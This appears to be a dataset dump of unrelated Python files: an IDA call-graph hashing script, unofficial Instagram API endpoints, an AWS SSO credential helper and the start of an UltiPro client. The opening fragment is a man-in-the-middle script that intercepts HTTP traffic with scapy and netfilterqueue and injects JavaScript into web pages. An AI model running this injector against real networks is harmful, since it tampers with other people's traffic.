packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.IP].chksum
return packet
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
print("[+] Request")
modified_load = re.sub("Accept-Encoding:.*?\\r\\n", "", scapy_packet[scapy.Raw].load)
new_packet = set_load(scapy_packet, modified_load)
packet.set_payload(str(new_packet))
elif scapy_packet[scapy.TCP].sport == 80:
print("[+] Response")
modified_load = scapy_packet[scapy.Raw].load.replace("</body", "<script>alert('test);</script></body>")
new_packet = set_load(scapy_packet, modified_load)
packet.set_payload(str(new_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
``` |
{
"source": "0xvico/graph-hash",
"score": 2
} |
#### File: 0xvico/graph-hash/graph_hash.py
```python
import idc
import idautils
import idaapi
import sys
import os
import hashlib
try:
import ssdeep
except:
pass
class CallGraph:
def __init__(self):
self.num_func = 0
self.graph_pattern = ''
self.roots = []
self.vertices = {}
self.min_ea = idaapi.cvar.inf.minEA
self.max_ea = idaapi.cvar.inf.maxEA
self.ea_size = self.max_ea - self.min_ea
def add_vertex(self, ea, func_type):
address_block = (ea - self.min_ea) * 16 / self.ea_size
vertex_value = chr(address_block) + chr(func_type)
self.vertices[ea] = {'index': self.num_func, 'func_type': func_type, 'value': vertex_value, 'targets': [], 'is_visited': 0}
self.num_func += 1
def add_root(self, ea):
self.roots.append(ea)
def set_roots(self):
for ea in self.vertices:
for target_ea in self.vertices[ea]['targets']:
if target_ea in self.roots:
self.roots.remove(target_ea)
def set_value(self):
for ea in self.vertices:
address_block = (ea - self.min_ea) * 16 / self.ea_size
func_type = self.vertices[ea]['func_type']
self.vertices[ea]['value'] = chr(address_block) + chr(func_type)
def connect_vertex(self, source_ea, target_ea):
if not target_ea in self.vertices[source_ea]['targets']:
self.vertices[source_ea]['targets'].append(target_ea)
def build_graph_pattern(self, vertex):
self.graph_pattern += self.vertices[vertex]['value']
if self.vertices[vertex]['is_visited'] == 0:
self.vertices[vertex]['is_visited'] = 1
for target_ea in self.vertices[vertex]['targets']:
self.build_graph_pattern(target_ea)
def get_graph_md5(self):
m = hashlib.md5()
m.update(self.graph_pattern)
return m.hexdigest()
def get_graph_sha1(self):
m = hashlib.sha1()
m.update(self.graph_pattern)
return m.hexdigest()
def get_graph_sha256(self):
m = hashlib.sha256()
m.update(self.graph_pattern)
return m.hexdigest()
def get_graph_ssdeep(self):
if 'ssdeep' in sys.modules:
return ssdeep.hash(self.graph_pattern)
else:
return 'No ssdeep Modules. Please Install ssdeep.'
def main():
imp_funcs = []
xrefs = []
cg = CallGraph()
file_name = idc.get_root_filename()
file_path = idc.GetInputFilePath()
def get_file_ssdeep():
if 'ssdeep' in sys.modules:
return ssdeep.hash_from_file(file_path)
else:
return 'No ssdeep Modules. Please Install ssdeep.'
def imp_cb(ea, name, ord):
imp_funcs.append(ea)
return True
if 'batch' in idc.ARGV:
idaapi.autoWait()
for fea in Functions():
func_flags = get_func_flags(fea)
# NORMAL = 0
# LIBRARY = 1
# IMPORTED = 2
# THUNK = 3
if func_flags & FUNC_LIB:
func_type = 1
elif func_flags & FUNC_THUNK:
func_type = 3
else:
func_type = 0
cg.add_vertex(fea, func_type)
cg.add_root(fea)
items = FuncItems(fea)
for item in items:
for xref in XrefsFrom(item, 0):
# https://www.hex-rays.com/products/ida/support/idadoc/313.shtml
if xref.type != fl_F:
xrefs.append([fea, xref.to])
# List Import Functions and Add to cg
num_imp_module = idaapi.get_import_module_qty()
for i in range(0, num_imp_module):
idaapi.enum_import_names(i, imp_cb)
imp_funcs.sort()
for imp_func_ea in imp_funcs:
cg.add_vertex(imp_func_ea, 2)
for xref in xrefs:
if xref[1] in cg.vertices:
cg.connect_vertex(xref[0], xref[1])
cg.set_roots()
for root in cg.roots:
cg.build_graph_pattern(root)
if len(idc.ARGV) == 0:
print('Graph MD5: %s' % cg.get_graph_md5())
print('Graph SHA1: %s' % cg.get_graph_sha1())
print('Graph SHA256: %s' % cg.get_graph_sha256())
print('Graph SSDEEP: %s' % cg.get_graph_ssdeep())
print('File SSDEEP: %s' % get_file_ssdeep())
if 'out_pattern' in idc.ARGV:
if not os.path.isdir('./out'):
os.mkdir('./out')
f = open('./out/' + file_name + '.bin', 'wb')
f.write(cg.graph_pattern)
f.close()
if 'batch' in idc.ARGV:
if not os.path.isdir('./out'):
os.mkdir('./out')
f = open('./out/result', 'a+')
f.write('%s,%s,%s,%s\n' % (file_name, cg.get_graph_md5(), cg.get_graph_ssdeep(), get_file_ssdeep()))
f.close()
idc.Exit(0)
if __name__ == '__main__':
main()
``` |
{
"source": "0xv/instagram_private_api",
"score": 2
} |
#### File: instagram_private_api/endpoints/friendships.py
```python
from ..compatpatch import ClientCompatPatch
class FriendshipsEndpointsMixin(object):
def autocomplete_user_list(self):
"""User list for autocomplete"""
res = self._call_api(
'friendships/autocomplete_user_list/',
query={'followinfo': 'True', 'version': '2'})
if self.auto_patch:
[ClientCompatPatch.list_user(user, drop_incompat_keys=self.drop_incompat_keys)
for user in res['users']]
return res
def user_following(self, user_id, **kwargs):
"""
Get user followings
:param user_id:
:param kwargs:
- **max_id**: For pagination
:return:
"""
endpoint = 'friendships/%(user_id)s/following/' % {'user_id': user_id}
query = {
'rank_token': self.rank_token,
}
query.update(kwargs)
res = self._call_api(endpoint, query=query)
if self.auto_patch:
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def user_followers(self, user_id, **kwargs):
"""
Get user followers
:param user_id:
:param kwargs:
- **max_id**: For pagination
:return:
"""
endpoint = 'friendships/%(user_id)s/followers/' % {'user_id': user_id}
query = {
'rank_token': self.rank_token,
}
query.update(kwargs)
res = self._call_api(endpoint, query=query)
if self.auto_patch:
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def friendships_pending(self):
"""Get pending follow requests"""
res = self._call_api('friendships/pending/')
if self.auto_patch and res.get('users'):
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def friendships_show(self, user_id):
"""
Get friendship status with user id
:param user_id:
:return:
.. code-block:: javascript
{
"status": "ok",
"incoming_request": false,
"is_blocking_reel": false,
"followed_by": false,
"is_muting_reel": false,
"outgoing_request": false,
"following": false,
"blocking": false,
"is_private": false
}
"""
endpoint = 'friendships/show/%(user_id)s/' % {'user_id': user_id}
res = self._call_api(endpoint)
return res
def friendships_show_many(self, user_ids):
"""
Get friendship status with mulitple user ids
:param user_ids: list of user ids
:return:
.. code-block:: javascript
{
"status": "ok",
"friendship_statuses": {
"123456789": {
"following": false,
"incoming_request": true,
"outgoing_request": false,
"is_private": false
}
}
}
"""
if isinstance(user_ids, str):
user_ids = [user_ids]
params = {
'_uuid': self.uuid,
'_csrftoken': self.csrftoken,
'user_ids': ','.join(user_ids)
}
res = self._call_api('friendships/show_many/', params=params, unsigned=True)
return res
def friendships_create(self, user_id):
"""
Follow a user
:param user_id: User id
:return:
.. code-block:: javascript
{
"status": "ok",
"friendship_status": {
"incoming_request": false,
"followed_by": false,
"outgoing_request": false,
"following": true,
"blocking": false,
"is_private": false
}
}
"""
endpoint = 'friendships/create/%(user_id)s/' % {'user_id': user_id}
params = {'user_id': user_id}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
def friendships_destroy(self, user_id, **kwargs):
"""
Unfollow a user
:param user_id: User id
:param kwargs:
:return:
.. code-block:: javascript
{
"status": "ok",
"incoming_request": false,
"is_blocking_reel": false,
"followed_by": false,
"is_muting_reel": false,
"outgoing_request": false,
"following": false,
"blocking": false,
"is_private": false
}
"""
endpoint = 'friendships/destroy/%(user_id)s/' % {'user_id': user_id}
params = {'user_id': user_id}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
def friendships_block(self, user_id):
"""
Block a user
:param user_id: User id
:return:
.. code-block:: javascript
{
"status": "ok",
"incoming_request": false,
"is_blocking_reel": false,
"followed_by": false,
"is_muting_reel": false,
"outgoing_request": false,
"following": false,
"blocking": true,
"is_private": false
}
"""
endpoint = 'friendships/block/%(user_id)s/' % {'user_id': user_id}
params = {'user_id': user_id}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
```
#### File: instagram_private_api/endpoints/live.py
```python
from ..utils import gen_user_breadcrumb
from ..compatpatch import ClientCompatPatch
class LiveEndpointsMixin(object):
def broadcast_like(self, broadcast_id, like_count=1):
"""
Like a live broadcast
:param broadcast_id: Broadcast id
:param like_count:
:return:
"""
if like_count < 1 or like_count > 5:
raise ValueError('Invalid like_count')
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/like/' % {'broadcast_id': broadcast_id}
params = {'user_like_count': str(like_count)}
params.update(self.authenticated_params)
return self._call_api(endpoint, params=params)
def broadcast_like_count(self, broadcast_id, like_ts=0):
"""
Get a live broadcast's like count
:param broadcast_id: Broadcast id
:return:
"""
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/get_like_count/' % {'broadcast_id': broadcast_id}
return self._call_api(endpoint, query={'like_ts': like_ts})
def broadcast_comments(self, broadcast_id, last_comment_ts=0):
"""
Get a live broadcast's latest comments
:param broadcast_id: Broadcast id
:param last_comment_ts:
:return:
"""
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/get_comment/' % {'broadcast_id': broadcast_id}
res = self._call_api(endpoint, query={'last_comment_ts': last_comment_ts})
if self.auto_patch and res.get('comments'):
[ClientCompatPatch.comment(c) for c in res.get('comments', [])]
if res.get('pinned_comment'):
ClientCompatPatch.comment(res['pinned_comment'])
return res
def broadcast_heartbeat_and_viewercount(self, broadcast_id):
"""
Get a live broadcast's heartbeat and viewer count
:param broadcast_id: Broadcast id
:return:
"""
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/heartbeat_and_get_viewer_count/' % {'broadcast_id': broadcast_id}
params = {
'_csrftoken': self.csrftoken,
'_uuid': self.uuid
}
return self._call_api(endpoint, params=params, unsigned=True)
def broadcast_comment(self, broadcast_id, comment_text):
"""
Post a comment to a live broadcast
:param broadcast_id: Broadcast id
:param comment_text: Comment text
:return:
"""
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/comment/' % {'broadcast_id': broadcast_id}
params = {
'live_or_vod': '1',
'offset_to_video_start': '0',
'comment_text': comment_text,
'user_breadcrumb': gen_user_breadcrumb(len(comment_text)),
'idempotence_token': self.generate_uuid(),
}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
if self.auto_patch and res.get('comment'):
ClientCompatPatch.comment(res['comment'])
return res
def broadcast_info(self, broadcast_id):
"""
Get broadcast information.
Known broadcast_status values: 'active', 'interrupted', 'stopped', 'hard_stop'
:param broadcast_id: Broadcast Id
:return:
.. code-block:: javascript
{
"status": "ok",
"broadcast_status": "active",
"media_id": "12345678934374208_123456789",
"cover_frame_url": "https://scontent-hkg3-1.cdninstagram.com/something.jpg",
"broadcast_owner": {
"username": "abc",
"friendship_status": {
"incoming_request": false,
"followed_by": false,
"outgoing_request": false,
"following": false,
"blocking": false,
"is_private": false
},
"profile_pic_url": "http://scontent-hkg3-1.cdninstagram.com/somethingelse.jpg",
"profile_pic_id": "1234567850644676241_123456789",
"full_name": "ABC",
"pk": 123456789,
"is_verified": true,
"is_private": false
},
"dash_abr_playback_url": null,
"broadcast_message": "",
"published_time": 1485312576,
"dash_playback_url": "https://scontent-hkg3-1.cdninstagram.com/hvideo-ash1/v/dash-hd/spmething.mpd",
"rtmp_playback_url": "rtmp://svelivestream007.16.ash1.facebook.com:16000/live-hd/something",
"id": 178591123456789,
"viewer_count": 9000.0
}
"""
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/info/' % {'broadcast_id': broadcast_id}
return self._call_api(endpoint)
def suggested_broadcasts(self, **kwargs):
"""
Get sugggested broadcasts
:param kwargs:
:return:
"""
return self._call_api('live/get_suggested_broadcasts/', query=kwargs)
```
#### File: instagram_private_api/endpoints/media.py
```python
import json
import re
from ..utils import gen_user_breadcrumb
from ..compatpatch import ClientCompatPatch
class MediaEndpointsMixin(object):
def media_info(self, media_id):
"""
Get media info
:param media_id:
:return:
"""
endpoint = 'media/%(media_id)s/info/' % {'media_id': media_id}
res = self._call_api(endpoint)
if self.auto_patch:
[ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys)
for m in res.get('items', [])]
return res
def medias_info(self, media_ids):
"""
Get multiple media infos
:param media_ids: list of media ids
:return:
"""
if isinstance(media_ids, str):
media_ids = [media_ids]
params = {
'_uuid': self.uuid,
'_csrftoken': self.csrftoken,
'media_ids': ','.join(media_ids),
'ranked_content': 'true'
}
res = self._call_api('media/infos/', params=params, unsigned=True)
if self.auto_patch:
[ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys)
for m in res.get('items', [])]
return res
def media_permalink(self, media_id):
"""
Get media permalink
:param media_id:
:return:
"""
endpoint = 'media/%(media_id)s/permalink/' % {'media_id': media_id}
res = self._call_api(endpoint)
return res
def media_comments(self, media_id, **kwargs):
"""
Get media comments. Fixed at 20 comments returned per page.
:param media_id: Media id
:param kwargs:
**max_id**: For pagination
:return:
"""
endpoint = 'media/%(media_id)s/comments/' % {'media_id': media_id}
res = self._call_api(endpoint, query=kwargs)
if self.auto_patch:
[ClientCompatPatch.comment(c, drop_incompat_keys=self.drop_incompat_keys)
for c in res.get('comments', [])]
return res
def media_n_comments(self, media_id, n=150, reverse=False, **kwargs):
"""
Helper method to retrieve n number of comments for a media id
:param media_id: Media id
:param n: Minimum number of comments to fetch
:param reverse: Reverse list of comments (ordered by created_time)
:param kwargs:
:return:
"""
endpoint = 'media/%(media_id)s/comments/' % {'media_id': media_id}
comments = []
results = self._call_api(endpoint, query=kwargs)
comments.extend(results.get('comments', []))
while results.get('has_more_comments') and results.get('next_max_id') and len(comments) < n:
kwargs.update({'max_id': results.get('next_max_id')})
results = self._call_api(endpoint, query=kwargs)
comments.extend(results.get('comments', []))
if not results.get('next_max_id') or not results.get('comments'):
# bail out if no max_id or comments returned
break
if self.auto_patch:
[ClientCompatPatch.comment(c, drop_incompat_keys=self.drop_incompat_keys)
for c in comments]
return sorted(comments, key=lambda k: k['created_time'], reverse=reverse)
def edit_media(self, media_id, caption, usertags=[]):
"""
Edit a media's caption
:param media_id: Media id
:param caption: Caption text
:param usertags: array of user_ids and positions in the format below:
.. code-block:: javascript
usertags = [
{"user_id":4292127751, "position":[0.625347,0.4384531]}
]
:return:
"""
endpoint = 'media/%(media_id)s/edit_media/' % {'media_id': media_id}
params = {'caption_text': caption}
params.update(self.authenticated_params)
if usertags:
utags = {'in': [{'user_id': u['user_id'], 'position': u['position']} for u in usertags]}
params['usertags'] = json.dumps(utags, separators=(',', ':'))
res = self._call_api(endpoint, params=params)
if self.auto_patch:
ClientCompatPatch.media(res.get('media'))
return res
def delete_media(self, media_id):
"""
Delete a media
:param media_id: Media id
:return:
.. code-block:: javascript
{"status": "ok", "did_delete": true}
"""
endpoint = 'media/%(media_id)s/delete/' % {'media_id': media_id}
params = {'media_id': media_id}
params.update(self.authenticated_params)
return self._call_api(endpoint, params=params)
def post_comment(self, media_id, comment_text):
"""
Post a comment.
Comment text validation according to https://www.instagram.com/developer/endpoints/comments/#post_media_comments
:param media_id: Media id
:param comment_text: Comment text
:return:
.. code-block:: javascript
{
"comment": {
"status": "Active",
"media_id": 123456789,
"text": ":)",
"created_at": 1479453671.0,
"user": {
"username": "x",
"has_anonymous_profile_picture": false,
"profile_pic_url": "http://scontent-sit4-1.cdninstagram.com/abc.jpg",
"full_name": "x",
"pk": 123456789,
"is_verified": false,
"is_private": false
},
"content_type": "comment",
"created_at_utc": 1479482471,
"pk": 17865505612040669,
"type": 0
},
"status": "ok"
}
"""
if len(comment_text) > 300:
raise ValueError('The total length of the comment cannot exceed 300 characters.')
if re.search(r'[a-z]+', comment_text, re.IGNORECASE) and comment_text == comment_text.upper():
raise ValueError('The comment cannot consist of all capital letters.')
if len(re.findall(r'#[^#]+\b', comment_text, re.UNICODE | re.MULTILINE)) > 4:
raise ValueError('The comment cannot contain more than 4 hashtags.')
if len(re.findall(r'\bhttps?://\S+\.\S+', comment_text)) > 1:
raise ValueError('The comment cannot contain more than 1 URL.')
endpoint = 'media/%(media_id)s/comment/' % {'media_id': media_id}
params = {
'comment_text': comment_text,
'user_breadcrumb': gen_user_breadcrumb(len(comment_text)),
'idempotence_token': self.generate_uuid(),
'containermodule': 'comments_feed_timeline'
}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
if self.auto_patch:
ClientCompatPatch.comment(res['comment'], drop_incompat_keys=self.drop_incompat_keys)
return res
def delete_comment(self, media_id, comment_id):
"""
Delete a comment
:param media_id: Media id
:param comment_id: Comment id
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/comment/%(comment_id)s/delete/' % {
'media_id': media_id, 'comment_id': comment_id}
params = {}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
def media_likers(self, media_id, **kwargs):
"""
Get users who have liked a post
:param media_id:
:return:
"""
endpoint = 'media/%(media_id)s/likers/' % {'media_id': media_id}
res = self._call_api(endpoint, query=kwargs)
if self.auto_patch:
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def media_likers_chrono(self, media_id):
"""
Get users who have liked a post in chronological order
:param media_id:
:return:
"""
res = self._call_api('media/%(media_id)s/likers_chrono/' % {'media_id': media_id})
if self.auto_patch:
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def post_like(self, media_id):
"""
Like a post
:param media_id: Media id
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/like/' % {'media_id': media_id}
params = {'media_id': media_id}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
def delete_like(self, media_id):
"""
Unlike a post
:param media_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/unlike/' % {'media_id': media_id}
params = {'media_id': media_id}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
def media_seen(self, reels):
"""
Mark multiple stories as seen
:param reels: A dict of media_ids and timings
.. code-block:: javascript
{
"1309763051087626108_124317": "1470355944_1470372029",
"1309764045355643149_124317": "1470356063_1470372039",
"1309818450243415912_124317": "1470362548_1470372060",
"1309764653429046112_124317": "1470356135_1470372049",
"1309209597843679372_124317": "1470289967_1470372013"
}
where
1309763051087626108_124317 = <media_id>,
1470355944_1470372029 is <media_created_time>_<view_time>
:return:
"""
params = {'nuxes': {}, 'reels': reels}
params.update(self.authenticated_params)
res = self._call_api('media/seen/', params=params)
return res
def comment_like(self, comment_id):
"""
Like a comment
:param comment_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(comment_id)s/comment_like/' % {'comment_id': comment_id}
params = self.authenticated_params
return self._call_api(endpoint, params=params)
def comment_likers(self, comment_id):
"""
Get users who have liked a comment
:param comment_id:
:return:
"""
endpoint = 'media/%(comment_id)s/comment_likers/' % {'comment_id': comment_id}
res = self._call_api(endpoint)
if self.auto_patch:
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def comment_unlike(self, comment_id):
"""
Unlike a comment
:param comment_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(comment_id)s/comment_unlike/' % {'comment_id': comment_id}
params = self.authenticated_params
return self._call_api(endpoint, params=params)
def save_photo(self, media_id):
"""
Save a photo
:param media_id: Media id
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/save/' % {'media_id': media_id}
params = {'radio_type': 'WIFI'}
params.update(self.authenticated_params)
return self._call_api(endpoint, params=params)
def unsave_photo(self, media_id):
"""
Unsave a photo
:param media_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/unsave/' % {'media_id': media_id}
params = {'radio_type': 'WIFI'}
params.update(self.authenticated_params)
return self._call_api(endpoint, params=params)
def disable_comments(self, media_id):
"""
Disable comments for a media
:param media_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/disable_comments/' % {'media_id': media_id}
params = {
'_csrftoken': self.csrftoken,
'_uuid': self.uuid,
}
res = self._call_api(endpoint, params=params, unsigned=True)
return res
def enable_comments(self, media_id):
"""
Enable comments for a media
:param media_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/enable_comments/' % {'media_id': media_id}
params = {
'_csrftoken': self.csrftoken,
'_uuid': self.uuid,
}
res = self._call_api(endpoint, params=params, unsigned=True)
return res
``` |
{
"source": "0xW1sKy/PowerShellTools",
"score": 2
} |
#### File: PowerShellTools/Reference/Get-AWSSSORoleCredential.py
```python
import boto3
import os
import subprocess
import sys
import getopt
import json
import datetime
import re
import webbrowser
import time
import configparser
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class awsRoleCredential:
def __init__(self, accountName, accountId, roleName, accessKey, secretKey, sessionToken, expiration):
self.accountName = accountName
self.accountId = accountId
self.roleName = roleName
self.accessKey = accessKey
self.secretKey = secretKey
self.sessionToken = sessionToken
self.expiration = expiration
#Add cross compatibility with the powershell version of this script.
#Allows conversion of dict object to be case insensitive
#Why aws responses in python have different capitalization than aws responses in powershell? dumb.
class CaseInsensitiveDict(dict):
class Key(str):
def __init__(self, key):
str.__init__(key)
def __hash__(self):
return hash(self.lower())
def __eq__(self, other):
return self.lower() == other.lower()
def __init__(self, data=None):
super(CaseInsensitiveDict, self).__init__()
if data is None:
data = {}
for key, val in data.items():
self[key] = val
def __contains__(self, key):
key = self.Key(key)
return super(CaseInsensitiveDict, self).__contains__(key)
def __setitem__(self, key, value):
key = self.Key(key)
super(CaseInsensitiveDict, self).__setitem__(key, value)
def __getitem__(self, key):
key = self.Key(key)
return super(CaseInsensitiveDict, self).__getitem__(key)
def urlCheck(string):
# findall() has been used
# with valid conditions for urls in string
url = re.match('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', string)
return url
def update_credentials_file(credential, profileLocation):
config = configparser.ConfigParser()
config.read(profileLocation)
profile_name = credential.accountName + "_" + credential.roleName
if profile_name not in config.sections():
config.add_section(profile_name)
assert profile_name in config.sections()
config[profile_name]["aws_access_key_id"] = str(credential.accessKey)
config[profile_name]["aws_secret_access_key"] = str(credential.secretKey)
config[profile_name]["aws_session_token"] = str(credential.sessionToken)
config.write(open(profileLocation, "w"), space_around_delimiters=False)
currentSession = boto3.session.Session()
defaultRegion = currentSession.region_name
newAccessToken = False
generateProfiles = False
startUrl = ''
accountId = ''
roleName = ''
passThru = ''
timeoutInSeconds = 60
clientName = 'default'
clientType = 'public'
path = os.path.join(os.environ['userprofile'],'.awsssohelper')
region = ''
accessToken = ''
try:
opts, args = getopt.getopt(
sys.argv[1:],
"argos:",
[
"accountId=",
"roleName=",
"generateProfiles",
"startUrl=",
"clientName=",
"clientType=",
"path=",
"newAccessToken",
"region="
])
except getopt.GetoptError:
print('ERROR: Unable to parseOptions')
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', "--help"):
print('Usage: Get-AWSSSORoleCredential.py -s "https://mycompany.awsapps.com/start/" --generateProfiles')
sys.exit()
elif opt in ("-s", "--startUrl"):
startUrl = arg
elif opt in ("-a", "--accountId"):
accountId = arg
elif opt in ("-r", "--roleName"):
roleName = arg
elif opt in ("-p", "--passThru"):
passThru = True
elif opt in ("-g", "--generateProfiles"):
generateProfiles = True
elif opt in ("-o", "--outputToCredFile"):
outputToCredFile = True
elif opt == '--clientName':
clientName = arg
elif opt == '--clientType':
clientType = arg
elif opt == '--path':
path = arg
elif opt == '--newAccessToken':
newAccessToken = True
elif opt == '--region':
region = arg
if not urlCheck(startUrl):
print(bcolors.FAIL, 'ERROR: No startUrl provided. (--startUrl "https://mycompany.awsapps.com/start")', bcolors.ENDC)
sys.exit(2)
if not region:
if not defaultRegion:
print(bcolors.OKBLUE, "INFORMATION: No region specified, and no default region configured. Using recommended region us-east-1.", bcolors.ENDC)
region = 'us-east-1'
else:
if defaultRegion != 'us-east-1':
print(
bcolors.WARNING,
"WARNING: Current session default region is: ",
"\r\n",
defaultRegion,
"\r\n",
"For this script we recommend using us-east-1 as your defined region.",
"\r\n",
"At the time of writing this script, us-east-1 is the only functional region for AWS SSO.",
"\r\n",
bcolors.ENDC
)
if input('Would you like to set the region for this script to us-east-1? (y/n): ') != 'y':
region = defaultRegion
else:
region = 'us-east-1'
else:
region = defaultRegion
urlSubDomain = re.search("(https?://)?([^:^/]*)(:\\d*)?(.*)?", startUrl).group(2).split('.')[0]
cachePath = os.path.join(path,urlSubDomain)
ssooidc = boto3.client(
'sso-oidc',
region_name=region
)
if not os.path.isdir(path):
try:
os.mkdir(path)
except OSError:
print (bcolors.FAIL, "ERROR: Creation of the directory %s failed" % path, bcolors.ENDC)
sys.exit(2)
else:
print (bcolors.OKGREEN, "SUCCESS: Successfully created the directory %s " % path, bcolors.ENDC)
if os.path.isfile(cachePath):
with open(cachePath) as json_file:
accessToken = json.load(json_file)
accessToken = CaseInsensitiveDict(accessToken)
if not accessToken:
newAccessToken = True
else:
sessionLength = round((datetime.datetime.utcfromtimestamp(int(re.split('\(|\)', accessToken['loggedAt'])[1][:10])) - datetime.datetime.utcnow() ).total_seconds()/60)
if sessionLength >= accessToken['expiresIn']:
newAccessToken = True
if newAccessToken:
client = ssooidc.register_client(
clientName=clientName,
clientType=clientType
)
deviceAuth = ssooidc.start_device_authorization(
clientId=client['clientId'],
clientSecret=client['clientSecret'],
startUrl=startUrl
)
try:
webbrowser.open(deviceAuth['verificationUriComplete'], new=0, autoraise=True)
except OSError:
print(bcolors.OKBLUE, "\r\n","Visit the following URL to authorise this session:", "\r\n", deviceAuth['verificationUriComplete'], "\r\n", bcolors.ENDC)
accessToken = ''
print(bcolors.OKBLUE,'Waiting for SSO login via browser...',bcolors.ENDC)
ssoStart = datetime.datetime.utcnow()
while not accessToken and (datetime.datetime.utcnow() - ssoStart).total_seconds() < deviceAuth['expiresIn']:
try:
accessToken = ssooidc.create_token(
clientId=client['clientId'],
clientSecret=client['clientSecret'],
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceAuth['deviceCode']
)
#add dumb formating for datetime to match the .Net JavaScript Deserialization format...
#helps with compatibility between python and powershell version of this script.
LoggedAt = '/Date(' + str(datetime.datetime.timestamp(datetime.datetime.strptime(accessToken['ResponseMetadata']['HTTPHeaders']['date'], '%a, %d %b %Y %H:%M:%S %Z').replace(tzinfo=datetime.timezone.utc)))[0:10] + ')/'
accessToken['LoggedAt']=LoggedAt
accessToken['startUrl']=startUrl
except:
time.sleep(deviceAuth['interval'])
if not accessToken:
print(bcolors.FAIL, 'ERROR: No access token obtianed.', bcolors.ENDC)
sys.exit(2)
else:
print(bcolors.OKGREEN, "\r\n", "Login Successful. Access Token Obtained", bcolors.ENDC)
with open(cachePath, 'w') as file:
file.write(json.dumps(accessToken))
sso = boto3.client(
'sso',
region_name=region
)
awsAccounts = sso.list_accounts(
maxResults = 123,
accessToken = accessToken['accessToken']
)
if not accountId :
accountId = [o['accountId'] for o in awsAccounts['accountList']]
credentials = []
for aId in accountId :
if not roleName :
ssoRoles = sso.list_account_roles(
accessToken = accessToken['accessToken'],
accountId = aId
)['roleList']
else :
ssoRoles = roleName
for role in ssoRoles :
ssoRoleCredential = sso.get_role_credentials(
roleName = role['roleName'],
accountId = role['accountId'],
accessToken = accessToken['accessToken']
).get('roleCredentials')
credentials.append(awsRoleCredential([o['accountName'] for o in awsAccounts['accountList'] if o['accountId'] == aId][0],
aId,
role['roleName'],
ssoRoleCredential['accessKeyId'],
ssoRoleCredential['secretAccessKey'],
ssoRoleCredential['sessionToken'],
ssoRoleCredential['expiration'])
)
if generateProfiles :
credentialPath = os.path.join(os.environ['userprofile'],".aws","credentials")
for credential in credentials :
update_credentials_file(credential, credentialPath)
print(bcolors.OKGREEN, len(credentials), " AWS Credentials have been added to your credential store.", bcolors.ENDC)
sys.exit()
credentials
``` |
{
"source": "0xW1sKy/ukg-python-sdk",
"score": 2
} |
#### File: src/ultipro/client.py
```python
from zeep import xsd
import csv
import os
import requests
import backoff
from ultipro.helpers import backoff_hdlr
from zeep import Client as ZeepClient
from zeep import Plugin
from zeep.transports import Transport
from lxml import etree
from ultipro.helpers import backoff_hdlr
import requests
import backoff # Helps handle intermittent 405 errors from server
@backoff.on_exception(
backoff.expo,
requests.exceptions.HTTPError,
max_tries=8,
on_backoff=backoff_hdlr,
)
class UltiProClient:
def __init__(
self,
username=os.environ.get("UKG_UserName"),
password=<PASSWORD>("UKG_Password"),
client_access_key=os.environ.get("UKG_ClientAccessKey"),
user_access_key=os.environ.get("UKG_UserAccessKey"),
base_url="https://service4.ultipro.com/services/",
):
assert username is not None
assert password is not None
assert client_access_key is not None
assert user_access_key is not None
assert base_url is not None
self.username = username
self.password = password
self.client_access_key = client_access_key
self.user_access_key = user_access_key
self.base_url = base_url
def authenticate(self):
login_header = {
